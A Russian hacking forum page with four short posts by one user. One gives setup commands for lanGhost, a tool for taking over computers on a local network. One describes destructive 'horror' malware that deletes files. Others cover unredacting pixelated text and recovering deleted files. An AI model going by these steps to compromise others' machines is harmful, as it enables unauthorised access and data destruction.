#28216 Взлом пк по локальной сети

Отправлено по roguevad   17 Июль 2021 - 02:09 в Делимся опытом.

Приветствую, хакеры! В этой небольшой статье я хотел бы рассказать о способе взлома компьютера через локальную сеть. Нам необходимо скачать программу LanGhost: управление пк в локальной сети. Даже в локальных сетях не стоит пренебрегать безопасностью. Это в большей степени касается предприятий с обширными корпоративными сетями. Возможность локально подключиться и манипулировать компьютером определенного сотрудника может привести к утечкам информации и прочим серьезным последствиям.

 

Установка:

 

   apt update

   apt upgrade

   apt install git python

   git clone https://github.com/xdavidhu/lanGhost

   pkg install tsu

   tsu

 

Запуск:

 

   cd LanGhost

   ./setup.py

 

Далее надо настроить lanGhost в 4 этапа. В первом нам нужно просто согласиться. Во втором прописать API созданного Телеграм бота(Fatherbot), и соответственно в третьем вписать проверочный код, который придет сразу же после второго шага. На четвертом этапе достаточно также все оставить по стандарту. После этого все готово к дальнейшей работе, можете использовать эту систему по назначению.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28206 Вирусы которые доведут до поломки не только компьютер, но и вашу психику!

Отправлено по roguevad   04 Июль 2021 - 01:26 в Делимся опытом.

Приветствую, хакеры! Существуют вирусы, которые могу нанести вред не только устройству, но и самому владельцу устройства (например, людям с эпилепсией). Их можно назвать хоррор-вирусы, обычно, они представляют собой что-то вроде хоррор-игры только на рабочем столе. Но некоторые из них могут нанести серьезный вред и самому компьютеру, поэтому в этой статье речь пойдет именно про них.

 

1. MrsMajor2.0.exe

После запуска .exe файла на рабочем столе появляется множество пустых файлов с демоническими иконками и именем «Humans Are Tasty». Включает хоррор звуки и меняет рабочего стола на черный фон. Затем, система перезагружается, и запускается графический интерфейс вируса в котором есть правила, следуя которым можно, при должном желании его отключить. Может существенно нанести вред устройству.

 

2. TheEchoOfFear.exe

Меняет изображение рабочего стола на хоррор-изображение с элементами скримера, появляется таймер, по истечении которого удалит все файлы на жестком диске и повредит систему. Представляет серьезную угрозу.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28853 Восстанавливаем замазанный текст

Отправлено по roguevad   04 Июнь 2022 - 02:06 в Делимся опытом.

wFSwsZi.png

 

Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете восстанавливать замазанный текст на изображении. В интернете довольно часто можно встретить изображения с замазанным вручную текстом. Обычно это скриншоты переписок или фотографии документов, где скрыты некоторые персональные данные. Немногие знают, но этот замазанный текст можно прочитать.

Такой трюк стал возможен при помощи нейросетей и программы Unredacter. Он способен откатить размытие и сделать текст под ним вновь читаемым. Для этого достаточно сделать несколько простых шагов:

● Переходим на GitHub;

● Скачиваем предложенные файлы на компьютер;

● Открываем командную строку и вводим команду «npm start»;

● Загружаем картинку с замазанным текстом.

После завершения, текст, спрятанный под пиксельным размытием, снова станет читаемым. Быстро и просто. Ну и небольшой совет от разработчиков программы: если хотите, чтобы с вашей картинкой не провели подобных манипуляций, замажьте текст черными полосами, а не пиксельным размытием. Такой эффект нейросети пока что не могут снять.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28727 Восстанавливаем удаленные файлы!

Отправлено по roguevad   23 Май 2022 - 01:00 в Делимся опытом.

EnKj90j.png

 

Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете восстановить уже удаленные файлы. Если вы случайно удалили удалили файлы с вашего ПК, то их не всегда можно легко восстановить, особенно если вы не знаете, как это сделать. На сегодня мы подготовили для вас утилиту, которая предназначена для восстановления удаленных из вашей системы файлов. Утилита рассчитана на операционную систему Windows. Называется она EaseUS Partition Master ТЫК .

 

Погнали!

 

1. Первым делом нам нужно скачать и запустить утилиту, а затем в главном окне выбрать место, где следует искать удалённые данные.

2. Выделяем диск, на котором раньше находились потерянные данные.

3. После чего нажимаем на кнопку «Сканирование».

 

По окончании операции сканирования, в главном окне вам будут представлены результаты поиска, то есть ваши утраченные данные.

Поэтому не стоит сразу паниковать, если вы случайно очистили корзину и удалил что-то важное, если вы заметите это как можно раньше, то высока вероятность вернуть потерянные файлы.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.